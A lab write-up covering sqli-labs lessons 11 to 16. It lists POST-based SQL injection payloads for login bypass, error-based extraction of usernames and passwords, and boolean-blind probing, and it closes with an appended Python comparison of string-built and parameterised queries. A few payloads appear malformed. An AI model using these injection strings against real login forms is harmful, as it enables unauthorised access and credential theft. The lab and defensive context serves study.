"Sqli-labs" Less11~less16

Source: Internet
Author: User
Tags closure

Notes from working through sqli-labs. The earlier notes cover the details more thoroughly; the following records only the key points.

Less11: POST injection, with echo and error messages

From Less11 onwards the labs use POST injection, and the page shows two input boxes. Firefox's F12 developer tools show the submitted parameters as

uname=1&passwd=1&submit=submit

Test the uname parameter first:

uname='&passwd=1&submit=submit

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "and password=" LIMIT 0,1 ' at line 1

This shows that the statement has the form where a='abc'.

Finally, the login is bypassed with an always-true condition:

uname=' or 1=1 limit 1,1-- a&passwd=&submit=submit

Less12:

Almost the same as Less11, except that the closure becomes ("xxx")

uname=") or 1=1 limit--A&passwd=&submit=submit

Less13: POST injection, no echo, with error messages

The same double injection as Less5; just pay attention to the closure.

uname=') union (select count(*), concat(@@version, floor(rand(0)*2)) a from information_schema.tables group by a)-- a&passwd=&submit=submit

Get the username and password:

uname=') union (select count(*), concat((select concat(username, '/', password) from users limit 0,1), floor(rand(0)*2)) a from information_schema.tables group by a)-- a&passwd=&submit=submit

Less14:

Almost the same as Less13, except that the closure becomes "a"

uname=" union (select count(*), concat((select concat(username, '/', password) from users limit 0,1), floor(rand(0)*2)) a from information_schema.tables group by a)-- a&passwd=&submit=submit

Less15: POST injection, Boolean blind

Because a successful login and a failed login give different results, blind injection is possible. With statements like the following, you need to test one character at a time.

uname=' or length(@@version)>10-- a&passwd=&submit=submit
uname=' or ascii(substr(@@version, +))>64-- a&passwd=&submit=submit

I'm really tired of trying.

Less16:

The same as Less15, only the closure is changed (PS: the name says time-based blind, but that feels completely useless)

uname=") or ascii(substr(@@version, +))>0-- a&passwd=&submit=submit
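Every input in these notes works by closing the quoting that the login query wraps around uname. The following is an added example, not part of the original notes or of sqli-labs itself, that puts a string-built login query next to one using bound parameters. It assumes SQLite in place of the lab's MySQL, a constructed users table, and query shapes guessed from the Less11 and Less13 closures.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the lab's users table (SQLite, not MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "s3cret"), ("guest", "guest")])
    return db

# Query shapes assumed from the closures the notes identify: 'x' and ('x').
VULNERABLE = {
    "less11": "SELECT username FROM users "
              "WHERE username='{u}' AND password='{p}' LIMIT 0,1",
    "less13": "SELECT username FROM users "
              "WHERE username=('{u}') AND password=('{p}') LIMIT 0,1",
}

def login_concat(db, style, uname, passwd):
    """String-built SQL: input can close the quote and rewrite the WHERE clause."""
    try:
        sql = VULNERABLE[style].format(u=uname, p=passwd)
        return db.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # the labs echo this error to the page; an application should not

def login_bound(db, uname, passwd):
    """Bound parameters: input is passed as data, so there is no closure to break."""
    return db.execute(
        "SELECT username FROM users WHERE username=? AND password=? LIMIT 0,1",
        (uname, passwd)).fetchone()

# Constructed inputs in the same shape as the ones in the notes.
PROBES = {"less11": "' or 1=1 -- a", "less13": "') or 1=1 -- a"}

def compare(db):
    """Return {style: (string-built result, bound result)} for each closure."""
    return {style: (login_concat(db, style, probe, ""),
                    login_bound(db, probe, ""))
            for style, probe in PROBES.items()}

if __name__ == "__main__":
    for style, (weak, safe) in compare(make_db()).items():
        print(style, "string-built:", weak, "bound:", safe)
```

With bound parameters the closure style no longer matters: the same query text handles every input, and the quote characters are compared as part of the username.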
